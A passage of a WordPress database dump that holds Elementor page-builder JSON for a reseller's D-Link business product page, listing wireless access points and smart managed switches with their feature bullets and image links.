]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7219,3360,'_elementor_version','2.5.14'),(7220,3360,'_elementor_edit_mode','builder'),(7223,3361,'_wp_page_template','template-fullwidth.php'),(7224,3361,'_elementor_template_type','post'),(7225,3361,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"149\",\"right\":\"149\",\"bottom\":\"149\",\"left\":\"149\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"27\",\"bottom\":\"27\",\"left\":\"27\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, 